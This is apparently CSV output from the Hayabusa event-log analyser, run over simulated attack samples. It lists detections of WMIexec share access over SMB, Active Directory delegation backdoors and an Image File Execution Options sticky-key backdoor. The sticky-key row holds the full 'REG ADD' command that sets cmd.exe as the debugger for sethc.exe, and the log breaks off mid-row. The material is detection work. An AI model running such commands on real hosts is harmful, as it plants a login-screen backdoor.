2021-04-26 17:25:37.335 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x4da321f,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:37.338 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:37.342 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x4da321f,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:37.344 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:37.348 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x4da321f,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:37.350 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:37.354 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x4da321f,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:37.356 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:37.360 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x4da321f,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:37.363 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:37.367 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x4da321f,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:37.369 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:37.373 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x4da321f,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:37.375 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:37.379 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x4da321f,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:37.381 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:37.385 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x4da321f,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:37.385 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 127.0.0.1 | LID: 0x4da32af,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:37.388 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:37.391 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x4da321f,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:37.392 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 127.0.0.1 | LID: 0x4da32af,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:37.392 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 127.0.0.1 | LID: 0x4da32af,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:37.394 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:37.399 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:38.406 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x4da321f,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:38.409 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:38.418 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x4da321f,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:38.420 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:38.435 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: cmd.exe /Q /c cd 1> \\127.0.0.1\ADMIN$\__1619425227.894209 2>&1 | Path: C:\Windows\System32\cmd.exe | PID: 0x1b98 | User: SRVDEFENDER01$ | LID: 
0x3e4,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" 2021-04-26 17:25:38.450 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x4da321f,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" 2021-04-26 17:25:38.452 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" 2021-04-26 17:25:38.456 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x4da321f,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" 2021-04-26 17:25:38.458 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 
0x4da321f,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" 2021-04-26 17:25:38.462 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x4da321f,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" 2021-04-26 17:25:38.463 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 127.0.0.1 | LID: 0x4da32af,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" 2021-04-26 17:25:38.463 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 127.0.0.1 | LID: 0x4da32af,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" 2021-04-26 17:25:38.464 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 
0x4da321f,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" 2021-04-26 17:25:38.479 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x4da321f,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" 2021-04-26 17:25:38.481 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" 2021-04-26 17:26:03.004 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0xc8c | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" 2021-04-26 18:07:00.330 +09:00,rootdc1.offsec.lan,5136,high,Persis,Active Directory User Backdoors,,../hayabusa-rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation 
(to specified service, Kerberos only).evtx" 2021-04-26 18:07:00.330 +09:00,rootdc1.offsec.lan,5136,high,Persis,Active Directory User Backdoors,,../hayabusa-rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx" 2021-04-26 18:07:00.331 +09:00,rootdc1.offsec.lan,5136,high,Persis,Active Directory User Backdoors,,../hayabusa-rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx" 2021-04-26 18:07:00.331 +09:00,rootdc1.offsec.lan,5136,high,Persis,Active Directory User Backdoors,,../hayabusa-rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx" 2021-04-26 18:07:00.331 +09:00,rootdc1.offsec.lan,5136,high,Persis,Active Directory User Backdoors,,../hayabusa-rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx" 2021-04-26 18:07:00.331 +09:00,rootdc1.offsec.lan,5136,high,Persis,Active Directory User Backdoors,,../hayabusa-rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx" 2021-04-26 18:07:00.332 +09:00,rootdc1.offsec.lan,5136,high,Persis,Active Directory User 
Backdoors,,../hayabusa-rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx" 2021-04-26 18:07:00.332 +09:00,rootdc1.offsec.lan,5136,high,Persis,Active Directory User Backdoors,,../hayabusa-rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx" 2021-04-26 18:08:00.382 +09:00,rootdc1.offsec.lan,5136,high,Persis,Active Directory User Backdoors,,../hayabusa-rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, any protocol).evtx" 2021-04-26 18:08:00.383 +09:00,rootdc1.offsec.lan,5136,high,Persis,Active Directory User Backdoors,,../hayabusa-rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, any protocol).evtx" 2021-04-26 18:08:00.383 +09:00,rootdc1.offsec.lan,5136,high,Persis,Active Directory User Backdoors,,../hayabusa-rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, any protocol).evtx" 2021-04-26 18:08:00.383 +09:00,rootdc1.offsec.lan,5136,high,Persis,Active Directory User Backdoors,,../hayabusa-rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account 
manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, any protocol).evtx" 2021-04-26 18:08:00.383 +09:00,rootdc1.offsec.lan,5136,high,Persis,Active Directory User Backdoors,,../hayabusa-rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, any protocol).evtx" 2021-04-26 18:08:00.384 +09:00,rootdc1.offsec.lan,5136,high,Persis,Active Directory User Backdoors,,../hayabusa-rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, any protocol).evtx" 2021-04-26 18:16:14.118 +09:00,srvdefender01.offsec.lan,12,medium,,Registry Key Create/Delete_Sysmon Alert,"technique_id=T1183,technique_name=Image File Execution Options Injection | CreateKey: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe | Process: C:\Windows\system32\reg.exe | PID: 4932 | PGUID: 5D63072B-84DE-6086-7B49-000000000C00",../hayabusa-rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID12,13-Stickey key registry update.evtx" 2021-04-26 18:16:14.119 +09:00,srvdefender01.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1183,technique_name=Image File Execution Options Injection | SetValue: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger: C:\windows\system32\cmd.exe | Process: C:\Windows\system32\reg.exe | PID: 4932 | PGUID: 
5D63072B-84DE-6086-7B49-000000000C00",../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID12,13-Stickey key registry update.evtx" 2021-04-26 18:16:14.119 +09:00,srvdefender01.offsec.lan,13,medium,Persis,CurrentVersion NT Autorun Keys Modification,,../hayabusa-rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID12,13-Stickey key registry update.evtx" 2021-04-26 18:16:14.119 +09:00,srvdefender01.offsec.lan,13,critical,PrivEsc | Persis,Sticky Key Like Backdoor Usage,,../hayabusa-rules/sigma/registry_event/registry_event_stickykey_like_backdoor.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID12,13-Stickey key registry update.evtx" 2021-04-26 18:17:14.111 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: REG ADD ""HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe"" /t REG_SZ /v Debugger /d ""C:\windows\system32\cmd.exe"" /f | Path: C:\Windows\System32\reg.exe | PID: 0x1b30 | User: admmig | LID: 0x2b5f6bf",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID4688-Stickey command reg update + execution.evtx 2021-04-26 18:17:37.439 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\windows\system32\cmd.exe sethc.exe 211 | Path: C:\Windows\System32\cmd.exe | PID: 0x14bc | User: SRVDEFENDER01$ | LID: 
